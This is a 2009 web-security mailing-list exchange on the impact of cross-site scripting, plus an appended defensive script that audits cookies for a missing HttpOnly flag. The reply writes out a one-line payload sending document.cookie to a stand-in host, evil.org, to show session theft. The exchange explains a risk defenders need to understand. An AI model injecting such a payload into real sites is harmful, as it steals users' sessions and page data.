[WEB SECURITY] XSS Impact

Porttikivi, Anssi anssi.porttikivi at kpmg.fi
Wed Jan 14 04:00:49 EST 2009


It is good to remind everybody here of the most common, basic
motivation for XSS exploitation. If the attacker can control the
JavaScript that is sent to the victim's browser, the attacker can inject
into the victim (you can try this schema in your browser URL input field):
 
    javascript:document.location="http://evil.org?x=" + document.cookie
 
Or the attacker could replace "document.cookie" with any other
Javascript construct, having access to all the data on the page that DOM
defines, then sending it to evil.org as URL parameters. 
 
So the peculiar risk and impact of XSS is that all the data on the page
plus cookies of that site can be stolen. It is up to the cleverness of
the attacker, what is done with that data:  stealing authentication
info, triggering malware downloads, doing XSRF or anything.


________________________________

	From: Pete Lindstrom [mailto:petelind at spiresecurity.com] 
	Sent: 14 January 2009 2:32
	To: websecurity at webappsec.org
	Subject: [WEB SECURITY] XSS Impact
	
	

	Greetings -

	 

	I am trying to get my arms around the cross-site scripting
vulnerability impact and can only come up with it as an enabler of other
exploits. Can you give me your best (highest impact) examples of what an
XSS vuln can do without combining with other exploit techniques?

	 

	Thanks,

	 

	Pete

	 

	Pete Lindstrom

	Research Director

	Spire Security

	610-644-9064

	blog: http://spiresecurity.typepad.com
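
An added example, not part of the original post: the `document.cookie` read described above only returns cookies set without the `HttpOnly` attribute, so a defender can audit a site's `Set-Cookie` headers to see which cookies injected script could reach. `HttpOnly` is not mentioned in the thread; the function names and the sample headers are constructed for illustration.

```javascript
// Added example: list the cookies that page script (document.cookie) can read.
// parseSetCookie / scriptReadableCookies are hypothetical helper names.

// Parse one Set-Cookie header value into its name and security attributes.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || "";
  const eq = first.indexOf("=");
  // Only the first "=" separates name from value; no "=" means no usable name.
  const name = eq === -1 ? "" : first.slice(0, eq).trim();
  const attrs = new Map();
  for (const p of parts) {
    const i = p.indexOf("=");
    // Attribute names are case-insensitive ("httponly" == "HttpOnly").
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs.set(key, i === -1 ? "" : p.slice(i + 1).trim());
  }
  return {
    name,
    httpOnly: attrs.has("httponly"),
    secure: attrs.has("secure"),
    sameSite: attrs.get("samesite") || null,
  };
}

// Names of cookies that an injected script would see in document.cookie.
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => c.name !== "" && !c.httpOnly)
    .map((c) => c.name);
}

// Constructed sample response headers (not taken from any real site).
const SAMPLE_HEADERS = [
  "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
  "auth_token=eyJ0eXAi; Path=/; Secure",
  "theme=dark; Path=/; Max-Age=31536000",
  "csrf=9f2c; Path=/; httponly",
];

for (const name of scriptReadableCookies(SAMPLE_HEADERS)) {
  console.log(`readable by page script: ${name}`);
}
```

Marking a session cookie `HttpOnly` removes it from `document.cookie`, but injected script can still read everything else the DOM exposes on the page, as the post points out.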

	 

	 

